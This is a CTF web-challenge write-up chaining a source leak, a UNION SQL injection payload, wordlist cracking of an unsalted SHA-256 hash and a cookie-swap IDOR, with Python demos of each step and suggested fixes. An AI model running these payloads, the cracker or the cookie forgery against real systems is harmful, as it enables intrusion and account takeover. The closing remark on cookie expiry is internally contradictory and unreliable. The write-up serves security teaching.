Tony Toolkit

0xFun CTF by smothy

Tony Toolkit - Web

Points: 250 | Difficulty: Medium | Flag: 0xfun{T0ny'5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n} | Solved by: Smothy @ 0xN1umb


what we got

basic web app - "Tony's Tools" shop with a search function and login page. description says tony's running his first bug bounty so there's gonna be "common vulnerabilities" lmao

first thing i did was check robots.txt and holy shit:

```
User-agent: *
Disallow: /main.pyi
Disallow: /user
Disallow: /secret/hints.txt
```

bro really just handed us the source code at /main.pyi

the solve

step 1: sqli go brrrr

looking at the source, the search endpoint is vulnerable af:

```python
query = "SELECT name, price FROM Products WHERE name LIKE '%" + str(item) + "%';"
```

no parameterized queries lol classic

dumped the users table ez:

/search?item=' UNION SELECT username, password FROM Users--

got two users:

  • Admin - password is all zeros (placeholder prob)
  • Jerry - hash: 059a00192592d5444bc0caad7203f98b506332e2cf7abb35d684ea9bf7c18f08
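Here's a self-contained reproduction of step 1, added to this writeup (it's my code, not the challenge's main.pyi): an in-memory SQLite DB with made-up Products/Users rows, the search query built by string concatenation exactly the way the source does it, and the parameterised version that the same payload bounces off. The table and column names come from the writeup; the rows, the placeholder hash and the function names are mine.

```python
import sqlite3

# Constructed demo data: the real challenge DB isn't available, these rows stand in for it.
USERS = [(1, "Admin", "0" * 64), (2, "Jerry", "deadbeef" * 8)]
PRODUCTS = [("Hammer", 12.5), ("Wrench", 8.0)]

# Same payload as the writeup: close the LIKE string, UNION in the Users table, comment out the tail.
PAYLOAD = "' UNION SELECT username, password FROM Users--"


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT)")
    con.execute("CREATE TABLE Products (name TEXT, price REAL)")
    con.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    con.executemany("INSERT INTO Products VALUES (?, ?)", PRODUCTS)
    return con


def search_vulnerable(con, item):
    # Same shape as the challenge's query: user input concatenated straight into the SQL.
    # With PAYLOAD this becomes:
    #   ... WHERE name LIKE '%' UNION SELECT username, password FROM Users--%';
    query = "SELECT name, price FROM Products WHERE name LIKE '%" + str(item) + "%';"
    return con.execute(query).fetchall()


def search_safe(con, item):
    # Parameterised: the input is bound as a value, so it can only ever be a LIKE pattern,
    # never SQL. (If you also want to stop users from using % and _ wildcards, escape them
    # and add an ESCAPE clause; that's a separate concern from injection.)
    pattern = "%" + str(item) + "%"
    return con.execute(
        "SELECT name, price FROM Products WHERE name LIKE ?", (pattern,)
    ).fetchall()


def demo():
    """Run the same payload through both versions; returns (leaked_rows, safe_rows)."""
    con = build_db()
    leaked = search_vulnerable(con, PAYLOAD)   # products plus every (username, password) row
    safe = search_safe(con, PAYLOAD)           # no product is literally named like the payload
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)
    print("parameterised:", safe)
```

The vulnerable query works because `LIKE '%'` matches every product, so the UNION just appends the credentials to a normal-looking result set; the column count (2) has to match, which is why the payload selects exactly username and password.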

step 2: crack that hash

hints.txt said "common passwords" and "hash cracking's a pain" so i threw it at john with rockyou:

```bash
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt jerry.hash
```

boom: 1qaz2wsx

ngl thats a keyboard pattern password lmaooo
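What john is doing under the hood, as an added example (mine, not from the writeup or the challenge): hash each wordlist candidate with unsalted SHA-256 and compare the digest against the target. The mini wordlist and the two mangling rules are constructed stand-ins for rockyou and john's rule sets; the `iter_wordlist` helper hashes raw bytes because rockyou.txt isn't valid UTF-8 throughout and a text-mode read blows up on it.

```python
import hashlib

# Jerry's hash as dumped from the Users table (unsalted SHA-256, hence john's raw-sha256 format).
JERRY_HASH = "059a00192592d5444bc0caad7203f98b506332e2cf7abb35d684ea9bf7c18f08"

# Constructed stand-in for rockyou.txt: a few common passwords, keyboard walks included.
MINI_WORDLIST = ["password", "123456", "qwerty", "1qaz2wsx", "letmein", "admin"]


def sha256_hex(candidate):
    # Raw SHA-256 of a string, hex-encoded the way the value is stored in the DB.
    return hashlib.sha256(candidate.encode()).hexdigest()


def iter_wordlist(path):
    # Read raw bytes and hash them as-is (that's what john does too); decode only for display.
    with open(path, "rb") as fh:
        for line in fh:
            yield line.rstrip(b"\r\n")


def mangle(word):
    # A couple of cheap rules in the spirit of john's rule files, which are far bigger.
    yield word
    yield word[:1].upper() + word[1:]
    yield word + b"1"
    yield word + b"!"


def crack_raw_sha256(target_hex, wordlist, rules=True):
    """Return the first candidate whose SHA-256 equals target_hex, or None if the list is exhausted."""
    target = bytes.fromhex(target_hex)  # compare raw digests, so hex case can't cause a miss
    for word in wordlist:
        if isinstance(word, str):
            word = word.encode()
        for cand in (mangle(word) if rules else (word,)):
            if hashlib.sha256(cand).digest() == target:
                return cand.decode("utf-8", "replace")
    return None


def demo():
    # Try Jerry's real hash against the constructed mini list; swap in
    # iter_wordlist("/usr/share/wordlists/rockyou.txt") for the real thing.
    return crack_raw_sha256(JERRY_HASH, MINI_WORDLIST)


if __name__ == "__main__":
    print(demo())
```

The reason this is cheap: the DB stores plain SHA-256 with no salt and no work factor, so one hash per candidate is all it costs, and any candidate that's in a public wordlist falls out in seconds.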

step 3: cookie manipulation

logged in as Jerry and looked at the /user endpoint. the code does this:

```python
import hashlib

def is_logged_in(request):
    cookie = request.cookies.get("user")
    # ... fetches every (username, password) row from the DB into results
    for name, password in results:
        # compares the cookie against EVERY user's token, not just the one userID points at
        if hashlib.sha256(f"{name}:{password}:{SECRET_LOGIN_TOKEN}".encode()).hexdigest() == cookie:
            return True  # any valid user's cookie is enough, userID is never checked
    return False
```

wait... the is_logged_in function checks if the user cookie hash matches ANY user in the database, but it doesn't verify that the userID cookie actually belongs to that user!!

so the play is:

  1. login as Jerry (userID=2)
  2. keep Jerry's valid user cookie hash
  3. change userID cookie to 1 (Admin)
  4. profit

```bash
curl -b "userID=1;user=0cea94be4ad3fc313cee0f65c3fd5dbc5dcf93d7e1bb337f2ecac06e52f29c28" \
     "http://chall.0xfun.org:38180/user"
```
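The broken check and a fixed one side by side, as an added example of mine (not the challenge's code): it keeps the same `name:password:SECRET_LOGIN_TOKEN` cookie scheme reconstructed from main.pyi, but the fixed version only looks up the row that the userID cookie names and compares in constant time. `SECRET_LOGIN_TOKEN`, the user rows and all function names are made up for the demo.

```python
import hashlib
import hmac
import sqlite3

# Constructed values: the challenge's real secret and DB aren't known, these stand in for them.
SECRET_LOGIN_TOKEN = "demo-secret-not-the-real-one"
USERS = [
    (1, "Admin", "0" * 64),
    (2, "Jerry", hashlib.sha256(b"1qaz2wsx").hexdigest()),
]


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return con


def user_token(name, password_hash):
    # What the app hands out as the "user" cookie after a successful login.
    return hashlib.sha256(f"{name}:{password_hash}:{SECRET_LOGIN_TOKEN}".encode()).hexdigest()


def is_logged_in_vulnerable(con, cookies):
    # Accepts the cookie if it matches ANY user's token; never reads userID at all.
    cookie = cookies.get("user")
    for name, password in con.execute("SELECT username, password FROM Users"):
        if user_token(name, password) == cookie:
            return True
    return False


def is_logged_in_fixed(con, cookies):
    # Only the row that userID claims is considered, so Jerry's token can't vouch for Admin.
    cookie = cookies.get("user")
    try:
        uid = int(cookies.get("userID", ""))
    except ValueError:
        return False
    row = con.execute("SELECT username, password FROM Users WHERE id = ?", (uid,)).fetchone()
    if row is None or cookie is None:
        return False
    # compare_digest avoids leaking how many leading characters matched
    return hmac.compare_digest(user_token(row[0], row[1]), cookie)


def demo():
    """Returns (vulnerable accepts forged, fixed accepts forged, fixed accepts legit)."""
    con = build_db()
    jerry_cookie = user_token("Jerry", USERS[1][2])
    forged = {"userID": "1", "user": jerry_cookie}   # Jerry's cookie, Admin's userID
    legit = {"userID": "2", "user": jerry_cookie}    # Jerry's cookie, Jerry's userID
    return (
        is_logged_in_vulnerable(con, forged),
        is_logged_in_fixed(con, forged),
        is_logged_in_fixed(con, legit),
    )


if __name__ == "__main__":
    print(demo())
```

Even the fixed version still has a design smell worth calling out: the cookie is derived from the password hash, so it never expires and changing nothing but the password invalidates it. A proper fix would issue a signed session token (HMAC over the user id plus an expiry) and derive the identity from that, instead of trusting a separate userID cookie at all.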


IDOR go crazy

flag

0xfun{T0ny'5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n}

fr tho this was a nice chain:

  • info disclosure (robots.txt + source leak)
  • sqli (dump creds)
  • hash cracking (weak password)
  • IDOR via cookie manipulation (broken auth check)

classic bug bounty stuff ngl, tony should've hired better devs


smothy out ✌️